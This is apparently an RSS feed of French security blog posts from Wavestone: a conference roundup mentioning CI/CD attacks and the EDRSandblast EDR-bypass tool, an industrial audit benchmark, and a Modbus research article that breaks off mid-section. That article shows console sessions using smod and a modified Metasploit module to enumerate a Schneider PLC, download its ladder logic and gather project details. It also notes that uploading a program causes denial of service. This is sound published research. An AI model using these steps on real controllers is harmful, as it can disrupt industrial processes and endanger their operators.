<p style="text-align: justify;">Les pipelines CI/CD font de plus en plus partie de l&rsquo;infrastructure standard des équipes de développement. Avec la montée en puissance de nouvelles approches telles que l&rsquo;Infrastructure as Code, le niveau de sensibilité de ces pipelines augmente rapidement. En cas de compromission, ce ne sont plus seulement les applications qui sont en danger mais les systèmes sous-jacents eux-mêmes et bien souvent l&rsquo;ensemble du système d&rsquo;information.</p>
<p style="text-align: justify;">Nous pensons que ces infrastructures, bien qu&rsquo;elles ne soient pas ciblées par les attaquants pour le moment, deviendront un point de mire privilégié pour les attaquants dans les années à venir. À la fois en raison des informations d&rsquo;identification manipulées par les pipelines et du manque habituel de surveillance de ces environnements.</p>
<p style="text-align: justify;">Lors du Hacking Summer Camp, nous avons expliqué comment les attaquants commencent à exploiter ces faiblesses à la fois pour des attaques de chaînes d&rsquo;approvisionnement mais aussi pour élever leurs privilèges au sein du SI victime. Nous avons commencé par une présentation au BSides Las Vegas qui illustrait un chemin d&rsquo;attaque que nous avions déjà exploité en opération réelle. Ensuite, nous avons organisé deux workshops, aux BSides Las Vegas et à la DEFCON, pour permettre aux participants d&rsquo;exploiter ces attaques dans un laboratoire grandeur nature.</p>
<p style="text-align: justify;"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-18804" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/09/etecyberWSImage2.png" alt="" width="1068" height="766" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/09/etecyberWSImage2.png 1068w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/09/etecyberWSImage2-266x191.png 266w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/09/etecyberWSImage2-54x39.png 54w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/09/etecyberWSImage2-768x551.png 768w" sizes="auto, (max-width: 1068px) 100vw, 1068px" /></p>
<p style="text-align: justify;">Les slides et les ressources techniques seront bientôt publiées sur notre GitHub (https://github.com/wavestone-cdt/DEFCON-CICD-pipelines-workshop).</p>
<p style="text-align: justify;">Le replay de la conférence à Bsides Las Vegas est disponible sur YouTube : <a href="https://youtu.be/a3SeASgtINY">https://youtu.be/a3SeASgtINY</a>.</p>
<p style="text-align: justify;"><em>Par Rémi ESCOURROU (@remiescourrou), Gauthier SEBAUX (@zeronounours) et Xavier GERONDEAU (@reivaxxavier1).</em></p>
<p style="text-align: justify;"> </p>
<h2 style="text-align: justify;">Systèmes de contrôle industriel</h2>
<p style="text-align: justify;">Cette année, nous avons animé deux workshops sur la cybersécurité des SI industriels à la DEFCON :</p>
<h3 style="text-align: justify;">Une version actualisée de notre très populaire atelier « Pentesting ICS 101 »:</h3>
<p style="text-align: justify;">Nous avons abordé les bases du SI industriel et partagé un retour d&rsquo;expérience sur l&rsquo;état de la cybersécurité de ces environnements. Ensuite, à l&rsquo;aide de machines virtuelles préconfigurées, nous avons appris à échanger des données avec des automates. Ces connaissances ont ensuite été mises en pratique sur du matériel réel avec notre maquette de train :</p>
<p style="text-align: justify;"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-18807" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/09/Image3-summercamps.jpg" alt="" width="1050" height="849" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2022/09/Image3-summercamps.jpg 1050w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/09/Image3-summercamps-236x191.jpg 236w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/09/Image3-summercamps-48x39.jpg 48w, https://www.riskinsight-wavestone.com/wp-content/uploads/2022/09/Image3-summercamps-768x621.jpg 768w" sizes="auto, (max-width: 1050px) 100vw, 1050px" /></p>
<p style="text-align: justify;"> </p>
<h2 style="text-align: justify;">Un tout nouvel atelier sur la sécurité du code PLC</h2>
<p style="text-align: justify;">Nous avons également commencé par une introduction aux ICS, puis nous nous sommes plongés dans la programmation d&rsquo;un automate logiciel et avons montré comment l&rsquo;application des pratiques du <a href="https://www.plc-security.com/">PLC TOP20</a> peut prévenir les attaques et/ou aider à les détecter.</p>
<p style="text-align: justify;">Pour ce faire, nous avons également créé une simulation de processus très simplifiée qui se connecte au simulateur de PLC, que nous publions également. Cette simulation pourrait être utilisée et adaptée pour la sensibilisation et la formation aux SCI.</p>
<p style="text-align: justify;">Les slides sont disponible ici : <a href="https://github.com/wavestone-cdt/plc-code-security">GitHub &#8211; wavestone-cdt/plc-code-security: Experiments with the Top 20 Secure PLC Coding Practices</a></p>
<p style="text-align: justify;">Vous pouvez trouver notre simulation de processus ici : <a href="https://github.com/arnaudsoullie/simple-process-simulation">https://github.com/arnaudsoullie/simple-process-simulation</a></p>
<p style="text-align: justify;"> </p>
<h2 style="text-align: justify;"><span style="color: revert; font-size: revert; font-weight: revert;">DEFCON30 demo lab: EDRSandblast</span></h2>
<p style="text-align: justify;">Nous avons partagé une version nouvelle et améliorée d&rsquo;EDRSandblast lors des sessions Demo Lab à DEFCON 30. Ce fut l&rsquo;occasion de présenter et de détailler les mécanismes de détection employés par les EDRs (user-land hooking, kernel callbacks, ETW Threat Intelligence provider &#8230;), de montrer comment les contourner, ainsi que de présenter les nouvelles fonctionnalités de notre outil. La liste des mises à jour est la suivante : un nouveau mécanisme de détection est reconnu et contourné par l&rsquo;outil, plusieurs pilotes vulnérables sont désormais pris en charge, EDRSandblast peut désormais être inclus en tant que bibliothèque dans un projet tiers, et bien plus encore !</p>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;">Vous pouvez trouver la liste complète des mises à jour, ainsi que la présentation sur GitHub : <a href="https://github.com/wavestone-cdt/EDRSandblast/blob/DefCon30Release/DEFCON30-DemoLabs-EDR_detection_mechanisms_and_bypass_techniques_with_EDRSandblast-v1.0.pdf">https://github.com/wavestone-cdt/EDRSandblast/blob/DefCon30Release/DEFCON30-DemoLabs-EDR_detection_mechanisms_and_bypass_techniques_with_EDRSandblast-v1.0.pdf</a></p>
<p style="text-align: justify;"><em>Par Maxime MEIGNAN (@th3m4ks) et Thomas DIOT (@_Qazeer).</em></p>
<p style="text-align: justify;"> </p>
<h2 style="text-align: justify;">SANS DFIR Summit 2022</h2>
<p style="text-align: justify;">Dans cette présentation, nous avons donné un bref aperçu de la procédure de récupération d&rsquo;une forêt AD et nous nous sommes concentrés sur les différents moyens de persistance utilisés par les attaquants sur Active Directory, certains bien connus, d&rsquo;autres moins. Certaines fonctionnalités de la nouvelle boîte à outils PowerShell de FarsightAD ont également été présentées, comme la détection d&rsquo;objets entièrement ou partiellement cachés à l&rsquo;aide du protocole Directory Replication Service.</p>
<p style="text-align: justify;">Vous pouvez trouver les slides et l’outil FarsightAD ici : <a href="https://github.com/Qazeer/FarsightAD">https://github.com/Qazeer/FarsightAD</a></p>
<p style="text-align: justify;">Par Thomas DIOT (@_Qazeer).</p>
<p style="text-align: justify;">Bonne lecture, bon tests, <em>Hack the Planet</em> <img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f60a.png" alt="😊" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;"> </p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2022/10/lete-cybersecurite-de-wavestone/">L’été cybersécurité de Wavestone</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.riskinsight-wavestone.com/2022/10/lete-cybersecurite-de-wavestone/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Cybersécurité des sites industriels : benchmark sur 40 audits</title>
		<link>https://www.riskinsight-wavestone.com/2021/05/cybersecurite-des-sites-industriels-benchmark-sur-40-audits/</link>
		
		<dc:creator><![CDATA[Arnaud Soullié]]></dc:creator>
		<pubDate>Tue, 25 May 2021 15:02:37 +0000</pubDate>
				<category><![CDATA[Eclairage]]></category>
		<category><![CDATA[Manufacturing & Industry 4.0]]></category>
		<category><![CDATA[audits]]></category>
		<category><![CDATA[benchmark]]></category>
		<category><![CDATA[étude]]></category>
		<category><![CDATA[industriel]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=15867</guid>

					<description><![CDATA[<p>Plus de 40 audits de sites industriels Au cours des deux dernières années, les auditeurs de Wavestone ont réalisé plus de 40 audits cybersécurité de sites industriels, dans des secteurs d’activité variés (pharmaceutique, agroalimentaire, énergie…). Ces audits ont ainsi permis...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2021/05/cybersecurite-des-sites-industriels-benchmark-sur-40-audits/">Cybersécurité des sites industriels : benchmark sur 40 audits</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h2 class="heading-text el-text">Plus de 40 audits de sites industriels</h2>
<div class="uncode_text_column">
<p>Au cours des deux dernières années, les auditeurs de Wavestone ont réalisé plus de 40 audits cybersécurité de sites industriels, dans des secteurs d’activité variés (pharmaceutique, agroalimentaire, énergie…).</p>
<p>Ces audits ont ainsi permis de réaliser <strong>un benchmark du niveau de cybersécurité de ces sites sur une sélection de thématiques.</strong></p>
</div>
<figure id="post-15868 media-15868" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-15868 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/Image-1.jpg" alt="" width="1280" height="720" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/Image-1.jpg 1280w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/Image-1-340x191.jpg 340w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/Image-1-69x39.jpg 69w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/Image-1-768x432.jpg 768w" sizes="auto, (max-width: 1280px) 100vw, 1280px" /></figure>
<h2 class="heading-text el-text">Notre méthodologie d&rsquo;audit</h2>
<div class="uncode_text_column">
<p>Wavestone a développé un framework d’évaluation de site industriels, adaptable aux spécificité sectorielles ou du client, permettant une évaluation globale du niveau de cybersécurité d’un site ou d’une ligne de production :</p>
</div>
<figure id="post-15870 media-15870" class="align-none"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-15870" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/Image-2-1.jpg" alt="" width="1280" height="503" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/Image-2-1.jpg 1280w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/Image-2-1-437x172.jpg 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/Image-2-1-71x28.jpg 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/Image-2-1-768x302.jpg 768w" sizes="auto, (max-width: 1280px) 100vw, 1280px" /></figure>
<div class="heading-text el-text">
<h2 class="h2">Focus sur 5 thématiques clés</h2>
</div>
<div class="uncode_text_column">
<p><strong>Ce benchmark du niveau de cybersécurité des sites industriels se base sur une sélection de thématiques : la gouvernance, la sécurité réseau, les accès distants, le maintien en conditions de sécurité et la résilience. </strong>Pour chacune de ces catégories, nous partageons les succès, les échecs et les recommandations, en concluant sur nos actions clés pour bien démarrer un programme de sécurisation des sites industriels.</p>
</div>
<p>Retrouvez <a href="https://www.wavestone.com/app/uploads/2021/03/2021-Wavestone-Cybersecurite-des-sites-industriels.pdf">l&rsquo;étude détaillée</a> et le replay du <a href="https://app.livestorm.co/wavestone/webinar-cybersecurite-des-sites-industriels-benchmark-sur-40-audits?type=detailed">webinar</a>.</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2021/05/cybersecurite-des-sites-industriels-benchmark-sur-40-audits/">Cybersécurité des sites industriels : benchmark sur 40 audits</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Fun with Modbus 0x5A</title>
		<link>https://www.riskinsight-wavestone.com/2018/02/fun-with-modbus-0x5a/</link>
		
		<dc:creator><![CDATA[Arnaud Soullié]]></dc:creator>
		<pubDate>Fri, 09 Feb 2018 17:45:05 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Deep-dive]]></category>
		<category><![CDATA[Ethical Hacking & Incident Response]]></category>
		<category><![CDATA[analyse]]></category>
		<category><![CDATA[audit]]></category>
		<category><![CDATA[ICS]]></category>
		<category><![CDATA[modbus]]></category>
		<category><![CDATA[SCADA]]></category>
		<category><![CDATA[SI industriel]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=15813</guid>

					<description><![CDATA[<p>Lors de la dernière édition de la DEFCON, nous avons présenté nos travaux de R&#38;D concernant un protocole propriétaire Schneider à l’ICS Village, espace dédié à la sécurité des SI industriels. Vous pouvez retrouver notre intervention en vidéo : https://www.youtube.com/watch?v=A_B69Rifu1g Revenons...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2018/02/fun-with-modbus-0x5a/">Fun with Modbus 0x5A</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="separator" style="clear: both; text-align: center;"></div>
<div style="text-align: justify;">
<figure id="post-15816 media-15816" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-15816 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/1.jpg" alt="" width="640" height="168" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/1.jpg 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/1-437x115.jpg 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/1-71x19.jpg 71w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
<p>Lors de la dernière édition de la DEFCON, nous avons présenté nos travaux de R&amp;D concernant un protocole propriétaire Schneider à l’ICS Village, espace dédié à la sécurité des SI industriels.</p>
</div>
<div style="text-align: justify;">Vous pouvez retrouver notre intervention en vidéo : <a href="https://www.youtube.com/watch?v=A_B69Rifu1g">https://www.youtube.com/watch?v=A_B69Rifu1g</a></div>
<div style="text-align: justify;">Revenons sur ces travaux et la manière dont ils peuvent être exploités.</div>
<div style="text-align: justify;">
<p>&nbsp;</p>
<h2>Le protocole Modbus</h2>
</div>
<div style="text-align: justify;">Le protocole Modbus est un standard de communication utilisé dans les SI industriels. Développé dans les années 70 sur liaison série RS-485, il est désormais très répandu dans sa version TCP utilisable sur une liaison Ethernet classique.</div>
<div style="text-align: justify;">Le protocole Modbus défini un certain nombre de fonctions, qui servent majoritairement à lire/écrire des données sur un automate programmable industriel.</div>
<div style="text-align: justify;"></div>
<div style="background-color: #dfd2ee; border: 1px solid black; padding-left: 1%; padding-right: 1%; width: 100%;">
<pre>root@kali:mbtget-master# ./mbtget -r3 -a 0 -n 8 192.168.0.110
values:
  1 (ad 00000):     1
  2 (ad 00001):     0
  3 (ad 00002):     0
  4 (ad 00003):     1
  5 (ad 00004):     0
  6 (ad 00005):     0
  7 (ad 00006):     0
  8 (ad 00007):     0</pre>
</div>
<div style="text-align: center;"><i>Lecture de données Modbus avec le programme « mbtget »</i></div>
<p>&nbsp;</p>
<div style="text-align: justify;">D’autres fonctions Modbus existent, comme l’indique ce tableau provenant du standard officiel :</div>
<div style="text-align: justify;">
<figure id="post-15818 media-15818" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-15818 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/2-1.png" alt="" width="640" height="442" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/2-1.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/2-1-277x191.png 277w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/2-1-56x39.png 56w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/2-1-245x170.png 245w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
</div>
<div style="text-align: justify;">
<div style="text-align: center;"><i>Spécifications du protocole Modbus (http://www.modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf)</i></div>
</div>
<p>&nbsp;</p>
<div style="text-align: justify;">Il est possible d’identifier la liste des fonctions Modbus supportées par un automate, par exemple avec l’outil smod:</div>
<div style="background-color: #dfd2ee; border: 1px solid black; padding-left: 1%; padding-right: 1%; width: 100%;">
<pre>root@kali:~/smod# python smod.py 
&lt; SMOD &gt;
 ------- 
        \   ^__^
         \  (xx)\_______
            (__)\       )\/\
             U  ||----w |
                ||     ||
          --=[MODBUS Penetration Test FrameWork
       --+--=[Version : 1.0.4
       --+--=[Modules : 23
       --+--=[Coder   : Farzin Enddo
          --=[github  : www.github.com/enddo

SMOD &gt; use modbus/scanner/getfunc
SMOD modbus(getfunc) &gt; show options
 Name     Current Setting  Required  Description                                 
 ----     ---------------  --------  -----------                                 
 Output   True             False     The stdout save in output directory         
 RHOSTS                    True      The target address range or CIDR identifier 
 RPORT    502              False     The port number for modbus protocol         
 Threads  1                False     The number of concurrent threads            
 UID      None             True      Modbus Slave UID.                           
SMOD modbus(getfunc) &gt; set RHOSTS 192.168.0.110
SMOD modbus(getfunc) &gt; set UID 1
SMOD modbus(getfunc) &gt; exploit
[+] Module Get Function Start
[+] Looking for supported function codes on 192.168.0.110
[+] Function Code 1(Read Coils) is supported.
[+] Function Code 2(Read Discrete Inputs) is supported.
[+] Function Code 3(Read Multiple Holding Registers) is supported.
[+] Function Code 4(Read Input Registers) is supported.
[+] Function Code 5(Write Single Coil) is supported.
[+] Function Code 6(Write Single Holding Register) is supported.
[+] Function Code 8(Diagnostic) is supported.
[+] Function Code 15(Write Multiple Coils) is supported.
[+] Function Code 16(Write Multiple Holding Registers) is supported.
[+] Function Code 22(Mask Write Register) is supported.
[+] Function Code 23(Read/Write Multiple Registers) is supported.
[+] Function Code 43(Read Device Identification) is supported.
[+] Function Code 90 is supported.</pre>
</div>
<p>&nbsp;</p>
<p>On peut ainsi utiliser les fonctions de diagnostique pour identifier précisément l’automate, en l’occurrence un Schneider M340 :</p>
<div style="text-align: justify;">
<p class="separator" style="clear: both; text-align: center;">
<figure id="post-15820 media-15820" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-15820 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/3.jpg" alt="" width="375" height="206" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/3.jpg 375w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/3-348x191.jpg 348w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/3-71x39.jpg 71w" sizes="auto, (max-width: 375px) 100vw, 375px" /></figure>
</div>
<div style="text-align: justify;">
<p>&nbsp;</p>
<h2>La fonction Modbus 0x5a</h2>
</div>
<div style="text-align: justify;">
<h3>Historique</h3>
</div>
<div style="text-align: justify;">L’utilisation du protocole Modbus pour la programmation des automates Schneider a été révélée publiquement grâce aux travaux du projet Basecamp lors de la célèbre conférence S4, dédiée à la sécurité des SI industriels : <a href="http://www.digitalbond.com/blog/2012/01/19/project-basecamp-at-s4/">http://www.digitalbond.com/blog/2012/01/19/project-basecamp-at-s4/</a></div>
<div style="text-align: justify;">Vous pouvez retrouver les vulnérabilités identifiées sur les systèmes Schneider (et bien d’autres) dans la présentation de Reid Wightman : <a href="https://youtu.be/dtadMIN3CCc?t=35m29">https://youtu.be/dtadMIN3CCc?t=35m29</a>s</div>
<div style="text-align: justify;">Nous avions déjà évoqué cette fonctionnalité dans notre article dédié au pentest d’automates dans le magazine MISC 74 . Il suffit d’observer les trames réseau échangées entre Unity Pro et l’automate lors de sa programmation pour identifier que c’est le protocole Modbus qui est utilisé, via une fonction non-documentée (90) :</div>
<p>&nbsp;</p>
<div style="text-align: justify;">
<div style="text-align: center;">
<figure id="post-15822 media-15822" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-15822 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/4.jpg" alt="" width="640" height="168" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/4.jpg 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/4-437x115.jpg 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/4-71x19.jpg 71w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
</div>
<div style="text-align: center;"><i>Capture réseau des échanges entre le logiciel de programmation et un automate Schneider</i></div>
<p>&nbsp;</p>
</div>
<div style="text-align: justify;">Comme les autres fonctions Modbus, il n’existe aucun mécanisme de sécurité pour ce protocole de programmation : il suffit d’avoir un accès réseau sur le port TCP 502 d’un automate pour pouvoir réaliser des actions d’administration.</div>
<p>&nbsp;</p>
<div style="text-align: justify;">
<h3>Récupération du programme automate</h3>
</div>
<div style="text-align: justify;">La récupération du programme de l’automate n’était, en tout cas dans nos tests, pas totalement fonctionnelle dans le module publié lors du projet Basecamp. Nous avions pu le modifier légèrement afin de prendre en compte des programmes de taille plus importante. Nous avons simplement eu à modifier un compteur pour la rendre fonctionnelle. Détaillons son utilisation.</div>
<div style="text-align: justify;">
<ul>
<li>Création d’une archive programme vide : Dans le logiciel Unity Pro, ouvrons un programme existant et enregistrons-le en tant qu’archive (« .sta »)</li>
<li>Récupérons le programme de l’automate</li>
</ul>
</div>
<div style="background-color: #dfd2ee; border: 1px solid black; padding-left: 1%; padding-right: 1%; width: 100%;">
<pre>msf auxiliary(modicon_stux_transfer_ASO) &gt; set ACTION DOWNLOAD
ACTION =&gt; DOWNLOAD
msf auxiliary(modicon_stux_transfer_ASO) &gt; run

[*] 192.168.0.110:502 - MODBUS - Sending read request
[*] 192.168.0.110:502 - MODBUS - Retrieving file
[*] 192.168.0.110:502 - MODBUS - Closing file  '/opt/metasploit/apps/pro/msf3/data
/exploits/modicon_ladder.apx'
[*] Auxiliary module execution completed
msf auxiliary(modicon_stux_transfer_ASO) &gt;</pre>
</div>
<ul>
<li>Insérons le fichier « .apx » dans l’archive</li>
</ul>
<div style="background-color: #dfd2ee; border: 1px solid black; padding-left: 1%; padding-right: 1%; width: 100%;">
<pre>root@kali:~# file demo_archive.sta 
demo_archive.sta: Zip archive data, at least v1.0 to extract
root@kali:~# unzip demo_archive.sta
Archive:  demo_archive.sta
   creating: BinAppli/
  inflating: BinAppli/Station.apd    
  inflating: BinAppli/Station.apx    
  inflating: STATION.CTX             
 extracting: TA.xma                  
   creating: ThirdParty/
root@kali:~/unity# cp /opt/metasploit/apps/pro/msf3/data/exploits/modicon_ladder.apx 
BinAppli/Station.apx
root@kali:~/unity# ls
BinAppli  demo_archive.sta  STATION.CTX  TA.xma  ThirdParty
root@kali:~/unity# rm BinAppli/Station.apd
root@kali:~/unity# zip demo_archive2.sta -r BinAppli/ STATION.CTX  TA.xma  ThirdParty/
  adding: BinAppli/ (stored 0%)
  adding: BinAppli/Station.apx (deflated 61%)
  adding: BinAppli/Station.apd (deflated 19%)
  adding: STATION.CTX (deflated 58%)
  adding: TA.xma (stored 0%)
  adding: ThirdParty/ (stored 0%)
root@kali:~/unity#</pre>
</div>
<ul>
<li>Ouvrons le fichier dans Unity : il suffit ensuite d’ouvrir le fichier avec Unity pro pour accéder au programme :</li>
</ul>
<p class="separator" style="clear: both; text-align: center;">
<div style="text-align: justify;">
<div style="text-align: center;">
<figure id="post-15824 media-15824" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-15824 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/5-1.png" alt="" width="640" height="393" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/5-1.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/5-1-311x191.png 311w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/5-1-64x39.png 64w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
</div>
<div style="text-align: center;"><i>Affichage du code « ladder » dans Unity Pro</i></div>
<p>&nbsp;</p>
</div>
<div style="text-align: justify;">La vidéo ci-dessous montre l’utilisation du module pour télécharger le programme et vérifier qu’il s’agit du même que celui issu de Unity Pro : <a href="https://www.youtube.com/watch?v=xRbulEX3_3o">https://www.youtube.com/watch?v=xRbulEX3_3o</a></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">La démarche inverse, reprogrammer l’automate, est également possible en théorie. En revanche, nous n’avons pas réussi à le rendre fonctionnel. Lors de l’upload d’un nouveau programme, nous obtenons ensuite cette erreur :</div>
<p>&nbsp;</p>
<div style="text-align: justify;">
<p id="post-15826 media-15826" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-15826 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/6.png" alt="" width="640" height="113" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/6.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/6-437x77.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/6-71x13.png 71w" sizes="auto, (max-width: 640px) 100vw, 640px" /></p>
</div>
<p>&nbsp;</p>
<div style="text-align: justify;">L’automate a bien été reprogrammé, mais il ne reconnaît pas le programme transmis et considère donc qu’il n’est pas programmé. Cette attaque permet donc plutôt un déni de service.</div>
<div style="text-align: justify;">
<h4>Récupération des informations du programme</h4>
</div>
<div style="text-align: justify;">L’analyse des trames échangées lors de l’initialisation de la connexion entre le logiciel de programmation légitime (Unity Pro) et l’automate permet d’identifier qu’un certain nombre d’informations sont envoyées par l’automate.</div>
<p class="separator" style="clear: both; text-align: center;">
<div style="text-align: center;">
<figure id="post-15828 media-15828" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-15828 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/7.png" alt="" width="640" height="364" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/7.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/7-336x191.png 336w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/7-69x39.png 69w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
</div>
<div style="text-align: justify;">
<div style="text-align: center;"><i>Capture réseau entre Unity Pro et un automate Schneider M340</i></div>
<p>&nbsp;</p>
</div>
<div style="text-align: justify;">Nous avons donc modifié le module Metasploit précédent afin de permettre la récupération de ces informations :</div>
<div style="text-align: justify;"></div>
<div style="background-color: #dfd2ee; border: 1px solid black; padding-left: 1%; padding-right: 1%; width: 100%;">
<pre>msf &gt; use auxiliary/admin/scada/modicon_stux_transfer_ASO 
msf auxiliary(modicon_stux_transfer_ASO) &gt; show actions

Auxiliary actions:

   Name          Description
   ----          -----------
   DOWNLOAD      Download the ladder logic from the PLC
   GATHER_INFOS  Get informations about the PLC configuration
   UPLOAD        Upload a ladder logic file to the PLC


msf auxiliary(modicon_stux_transfer_ASO) &gt; set ACTION GATHER_INFOS 
ACTION =&gt; GATHER_INFOS
msf auxiliary(modicon_stux_transfer_ASO) &gt; show options

Module options (auxiliary/admin/scada/modicon_stux_transfer_ASO):

   Name      Current Setting                     Required  Description
   ----      ---------------                     --------  -----------
   FILENAME  [...]/modicon_ladder.apx            yes       The file to send or receive
   RHOST                                         yes       The target address
   RPORT     502                                 yes       The target port


Auxiliary action:

   Name          Description
   ----          -----------
   GATHER_INFOS  Get informations about the PLC configuration


msf auxiliary(modicon_stux_transfer_ASO) &gt; set RHOST 192.168.0.110
RHOST =&gt; 192.168.0.110
msf auxiliary(modicon_stux_transfer_ASO) &gt; run

[*] Sending initialization requests ...
[+] PLC model : BMX P34 2030
[+] Project name : Test - Project ABC 123 Yolo
[+] Project comments : this is where the comments are put. YOLO @@@ !!!
[+] Unity Pro software version : V5.0
[*] Auxiliary module execution completed</pre>
</div>
<div style="text-align: justify;">
<p style="text-align: center;"><i>Récupération d’information via le module Metasploit</i></p>
</div>
<p>&nbsp;</p>
<div style="text-align: justify;">Ces informations concordent avec celles obtenues graphiquement dans le logiciel légitime :</div>
<p>&nbsp;</p>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<figure id="post-15830 media-15830" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-15830 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/8.png" alt="" width="525" height="408" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/8.png 525w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/8-246x191.png 246w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/8-50x39.png 50w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/8-156x121.png 156w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/8-155x120.png 155w" sizes="auto, (max-width: 525px) 100vw, 525px" /></figure>
</div>
<div style="text-align: center;"><i>Informations sur le projet dans Unity pro</i></div>
<p>&nbsp;</p>
</div>
<div style="text-align: justify;">
<h3>Forçage de valeurs</h3>
</div>
<div style="text-align: justify;">Le logiciel Unity Pro embarque également des fonctionnalités de simulation et de « forçage » des valeurs de l’automate. En effet, lors de l’installation d’un nouveau procédé industriel, il peut s’avérer pratique de « fausser » la valeur d’une variable pour simuler une action ou une situation spécifique. L’équivalent dans le monde informatique serait de « coder en dur » la valeur d’une variable.</div>
<div style="text-align: justify;">Cette opération se réalise dans Unity Pro par la création d’une « table d’animation » dans laquelle on va renseigner les variables à forcer :</div>
<p>&nbsp;</p>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
